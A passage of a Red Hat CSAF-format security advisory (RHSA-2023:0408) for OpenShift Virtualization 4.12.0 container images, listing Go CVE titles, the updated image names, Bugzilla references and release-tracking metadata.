golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)\n\n* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)\n\n* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)\n\n* golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)\n\n* golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nRHEL-8-CNV-4.12\n\n==============\n\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2023:0408", "url": "https://access.redhat.com/errata/RHSA-2023:0408" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "1719190", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1719190" }, { "category": "external", "summary": "2023393", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2023393" }, { "category": "external", "summary": "2030801", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030801" }, { "category": "external", "summary": "2030806", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030806" }, { "category": "external", "summary": "2040377", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2040377" }, { "category": "external", "summary": "2046298", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2046298" }, { "category": "external", "summary": "2052556", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2052556" }, { "category": "external", "summary": "2053429", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053429" }, { "category": "external", "summary": "2053532", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053532" }, { "category": "external", "summary": "2053541", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053541" }, { "category": "external", "summary": "2060499", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060499" }, { "category": "external", "summary": "2069098", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2069098" }, { "category": "external", "summary": "2070366", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2070366" }, { "category": "external", "summary": "2071491", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2071491" }, { "category": "external", "summary": "2072797", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2072797" }, { "category": "external", "summary": "2072821", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2072821" }, { "category": "external", "summary": "2079916", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2079916" }, { "category": "external", "summary": "2084085", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084085" }, { "category": "external", "summary": "2086285", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086285" }, { "category": "external", "summary": "2086551", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2086551" }, { "category": "external", "summary": "2087724", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2087724" }, { "category": "external", "summary": "2088129", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088129" }, { "category": "external", "summary": "2088464", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2088464" }, { "category": "external", "summary": "2089391", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089391" }, { "category": "external", "summary": "2089744", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089744" }, { "category": "external", "summary": "2089751", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089751" }, { "category": "external", "summary": "2089804", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089804" }, { "category": "external", "summary": "2091856", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091856" }, { "category": "external", "summary": "2092793", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092793" }, { "category": "external", "summary": "2092796", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092796" }, { "category": "external", "summary": "2093771", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093771" }, { "category": "external", "summary": "2093996", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2093996" }, { "category": "external", "summary": "2094202", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094202" }, { "category": "external", "summary": "2096285", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096285" }, { "category": "external", "summary": "2096780", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096780" }, { "category": "external", "summary": "2097436", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097436" }, { "category": "external", "summary": "2097586", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2097586" }, { "category": "external", "summary": "2099556", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099556" }, { "category": "external", "summary": "2099573", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099573" }, { "category": "external", "summary": "2099923", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099923" }, { "category": "external", "summary": "2100290", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100290" }, { "category": "external", "summary": "2100436", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100436" }, { "category": "external", "summary": "2100442", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100442" }, { "category": "external", "summary": "2100495", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100495" }, { "category": "external", "summary": "2100629", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100629" }, { "category": "external", "summary": "2100679", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100679" }, { "category": "external", "summary": "2100682", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100682" }, { "category": "external", "summary": "2100684", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100684" }, { "category": "external", "summary": "2101144", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101144" }, { "category": "external", "summary": "2101164", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101164" }, { "category": "external", "summary": "2101167", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101167" }, { "category": "external", "summary": "2101333", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101333" }, { "category": "external", "summary": "2101335", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101335" }, { "category": "external", "summary": "2101390", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101390" }, { "category": "external", "summary": "2101394", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101394" }, { "category": "external", "summary": "2101423", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101423" }, { "category": "external", "summary": "2101430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101430" }, { "category": "external", "summary": "2101445", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101445" }, { "category": "external", "summary": "2101454", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101454" }, { "category": "external", "summary": "2101499", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101499" }, { "category": "external", "summary": "2101501", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101501" }, { "category": "external", "summary": "2101628", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101628" }, { "category": "external", "summary": "2101667", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101667" }, { "category": "external", "summary": "2101681", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2101681" }, { "category": "external", "summary": "2102074", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102074" }, { "category": "external", "summary": "2102125", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102125" }, { "category": "external", "summary": "2102132", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102132" }, { "category": "external", "summary": "2102138", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102138" }, { "category": "external", "summary": "2102256", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102256" }, { "category": "external", "summary": "2102448", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102448" }, { "category": "external", "summary": "2102475", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102475" }, { "category": "external", "summary": "2102561", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102561" }, { "category": "external", "summary": "2102737", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102737" }, { "category": "external", "summary": "2102740", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102740" }, { "category": "external", "summary": "2103806", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2103806" }, { "category": "external", "summary": "2103807", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2103807" }, { "category": "external", "summary": "2103817", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2103817" }, { "category": "external", "summary": "2103844", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2103844" }, { "category": "external", "summary": "2104331", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104331" }, { "category": "external", "summary": "2104402", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104402" }, { "category": "external", "summary": "2104422", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104422" }, { "category": "external", "summary": "2104424", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104424" }, { "category": "external", "summary": "2104479", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104479" }, { "category": "external", "summary": "2104480", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104480" }, { "category": "external", "summary": "2104785", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104785" }, { "category": "external", "summary": "2104859", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2104859" }, { "category": "external", "summary": "2105257", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2105257" }, { "category": "external", "summary": "2106175", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2106175" }, { "category": "external", "summary": "2106963", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2106963" }, { "category": "external", "summary": "2107279", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107279" }, { "category": "external", "summary": "2107342", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342" }, { "category": "external", "summary": "2107371", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371" }, { "category": "external", "summary": "2107374", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374" }, { "category": "external", "summary": "2107376", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376" }, { "category": "external", "summary": "2107383", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383" }, { "category": "external", "summary": "2107386", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386" }, { "category": "external", "summary": "2107388", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388" }, { "category": "external", "summary": "2107390", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390" }, { "category": "external", "summary": "2107392", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392" }, { "category": "external", "summary": "2108339", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2108339" }, { "category": "external", "summary": "2108638", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2108638" }, { "category": "external", "summary": "2109818", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2109818" }, { "category": "external", "summary": "2109975", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2109975" }, { "category": "external", "summary": "2110256", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2110256" }, { "category": "external", "summary": "2110562", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2110562" }, { "category": "external", "summary": "2111240", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111240" }, { "category": "external", "summary": "2111292", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111292" }, { "category": "external", "summary": "2111328", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111328" }, { "category": "external", "summary": "2111378", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111378" }, { "category": "external", "summary": "2111744", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111744" }, { "category": "external", "summary": "2111794", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2111794" }, { "category": "external", "summary": "2112900", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2112900" }, { "category": "external", "summary": "2114516", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2114516" }, { "category": "external", "summary": "2114636", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2114636" }, { "category": "external", "summary": "2114683", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2114683" }, { "category": "external", "summary": "2115257", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2115257" }, { "category": "external", "summary": "2115258", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2115258" }, { "category": "external", "summary": "2115280", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2115280" }, { "category": "external", "summary": "2115769", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2115769" }, { "category": "external", "summary": "2116225", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2116225" }, { "category": "external", "summary": "2116644", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2116644" }, { "category": "external", "summary": "2117549", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117549" }, { "category": "external", "summary": "2117803", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117803" }, { "category": "external", "summary": "2117813", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117813" }, { "category": "external", "summary": "2117872", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872" }, { "category": "external", "summary": "2118257", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2118257" }, { "category": "external", "summary": "2118823", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2118823" }, { "category": "external", "summary": "2119069", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2119069" }, { "category": "external", "summary": "2119128", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2119128" }, { "category": "external", "summary": "2119309", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2119309" }, { "category": "external", "summary": "2119615", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2119615" }, { "category": "external", "summary": "2120907", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2120907" }, { "category": "external", "summary": "2121320", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2121320" }, { "category": "external", "summary": "2122236", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2122236" }, { "category": "external", "summary": "2122990", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2122990" }, { "category": "external", "summary": "2124147", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124147" }, { "category": "external", "summary": "2124307", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124307" }, { "category": "external", "summary": "2124528", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124528" }, { "category": "external", "summary": "2124555", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124555" }, { "category": "external", "summary": "2124557", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124557" }, { "category": "external", "summary": "2124558", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124558" }, { "category": "external", "summary": "2124565", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124565" }, { "category": "external", "summary": "2124572", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124572" }, { "category": "external", "summary": "2124582", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124582" }, { "category": "external", "summary": "2124594", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124594" }, { "category": "external", "summary": "2124597", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124597" }, { "category": "external", "summary": "2126104", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2126104" }, { "category": "external", "summary": "2126397", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2126397" }, { "category": "external", "summary": "2127787", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127787" }, { "category": "external", "summary": "2127843", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127843" }, { "category": "external", "summary": "2127931", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127931" }, { "category": "external", "summary": "2127947", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127947" }, { "category": "external", "summary": "2128002", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2128002" }, { "category": "external", "summary": "2128107", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2128107" }, { "category": "external", "summary": "2128872", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2128872" }, { "category": "external", "summary": "2128948", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2128948" }, { "category": "external", "summary": "2128949", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2128949" }, { "category": "external", "summary": "2128997", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2128997" }, { "category": "external", "summary": "2129013", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2129013" }, { "category": "external", "summary": "2129234", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2129234" }, { "category": "external", "summary": "2129301", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2129301" }, { "category": "external", "summary": "2129870", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2129870" }, { "category": "external", "summary": "2130509", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2130509" }, { "category": "external", "summary": "2130588", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2130588" }, { "category": "external", "summary": "2130695", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2130695" }, { "category": "external", "summary": "2130909", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2130909" }, { "category": "external", "summary": "2131157", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2131157" }, { "category": "external", "summary": "2131165", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2131165" }, { "category": "external", "summary": "2131674", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2131674" }, { "category": "external", "summary": "2132031", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132031" }, { "category": "external", "summary": "2132682", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132682" }, { "category": "external", "summary": "2132721", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132721" }, { "category": "external", "summary": "2132744", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132744" }, { "category": "external", "summary": "2132746", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132746" }, { "category": "external", "summary": "2132783", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132783" }, { "category": "external", "summary": "2132793", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132793" }, { "category": "external", "summary": "2132932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132932" }, { "category": "external", "summary": "2133540", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133540" }, { "category": "external", "summary": "2133541", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133541" }, { "category": "external", "summary": "2133542", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133542" }, { "category": "external", "summary": "2133543", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133543" }, { "category": "external", "summary": "2133655", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133655" }, { "category": "external", "summary": "2133656", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133656" }, { "category": "external", "summary": "2133659", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133659" }, { "category": "external", "summary": "2133660", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133660" }, { "category": "external", "summary": "2134123", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2134123" }, { "category": "external", "summary": "2134672", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2134672" }, { "category": "external", "summary": "2134825", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2134825" }, { "category": "external", "summary": "2135805", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2135805" }, { "category": "external", "summary": "2136051", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2136051" }, { "category": "external", "summary": "2136425", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2136425" }, { "category": "external", "summary": "2136534", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2136534" }, { "category": "external", "summary": "2137123", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137123" }, { "category": "external", "summary": "2137241", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137241" }, { "category": "external", "summary": "2137243", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137243" }, { "category": "external", "summary": "2137349", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137349" }, { "category": "external", "summary": "2137591", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137591" }, { "category": "external", "summary": "2137731", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137731" }, { "category": "external", "summary": "2137733", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137733" }, { "category": "external", "summary": "2137736", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137736" }, { "category": "external", "summary": "2137896", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137896" }, { "category": "external", "summary": "2138112", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2138112" }, { "category": "external", "summary": "2138119", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2138119" }, { "category": "external", "summary": "2138199", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2138199" }, { "category": "external", "summary": "2138653", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2138653" }, { "category": "external", "summary": "2138657", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2138657" }, { "category": "external", "summary": "2138664", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2138664" }, { "category": "external", "summary": "2139257", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139257" }, { "category": "external", "summary": "2139260", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139260" }, { "category": "external", "summary": "2139293", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139293" }, { "category": "external", "summary": "2139296", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139296" }, { "category": "external", "summary": "2139299", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139299" }, { "category": "external", "summary": "2139306", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139306" }, { "category": "external", "summary": "2139479", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139479" }, { "category": "external", "summary": "2139574", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139574" }, { "category": "external", "summary": "2139651", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139651" }, { "category": "external", "summary": "2139687", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139687" }, { "category": "external", "summary": "2139738", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139738" }, { "category": "external", "summary": "2139820", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139820" }, { "category": "external", "summary": "2140117", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140117" }, { "category": "external", "summary": "2140521", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140521" }, { "category": "external", "summary": "2140534", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140534" }, { "category": "external", "summary": "2140627", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140627" }, { "category": "external", "summary": "2140730", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140730" }, { "category": "external", "summary": "2140808", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140808" }, { "category": "external", "summary": "2140977", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140977" }, { "category": "external", "summary": "2140982", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140982" }, { "category": "external", "summary": "2140998", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140998" }, { "category": "external", "summary": "2141089", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2141089" }, { "category": "external", "summary": "2141302", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2141302" }, { "category": "external", "summary": "2141399", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2141399" }, { "category": "external", "summary": "2141494", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2141494" }, { "category": "external", "summary": "2141654", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2141654" }, { "category": "external", "summary": "2141711", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2141711" }, { "category": "external", "summary": "2142468", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2142468" }, { "category": "external", "summary": "2142470", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2142470" }, { "category": "external", "summary": "2142511", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2142511" }, { "category": "external", "summary": "2142647", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2142647" }, { "category": "external", "summary": "2142891", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2142891" }, { "category": "external", "summary": "2142929", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2142929" }, { "category": "external", "summary": "2143268", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2143268" }, { "category": "external", "summary": "2143498", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2143498" }, { "category": "external", "summary": "2143964", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2143964" }, { "category": "external", "summary": "2144580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2144580" }, { "category": "external", "summary": "2144828", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2144828" }, { "category": "external", "summary": "2144839", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2144839" }, { "category": "external", "summary": "2153849", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2153849" }, { "category": "external", "summary": "2155757", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2155757" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_0408.json" } ], "title": "Red Hat Security Advisory: OpenShift Virtualization 4.12.0 Images security update", "tracking": { "current_release_date": "2024-11-25T13:35:28+00:00", "generator": { "date": "2024-11-25T13:35:28+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2023:0408", "initial_release_date": "2023-01-25T11:11:29+00:00", "revision_history": [ { "date": "2023-01-25T11:11:29+00:00", "number": "1", "summary": "Initial version" }, { "date": "2023-01-25T11:11:29+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-25T13:35:28+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "CNV 4.12 for RHEL 8", "product": { "name": "CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12", "product_identification_helper": { "cpe": "cpe:/a:redhat:container_native_virtualization:4.12::el8" } } } ], "category": "product_family", "name": "OpenShift Virtualization" }, { "branches": [ { "category": "product_version", "name": 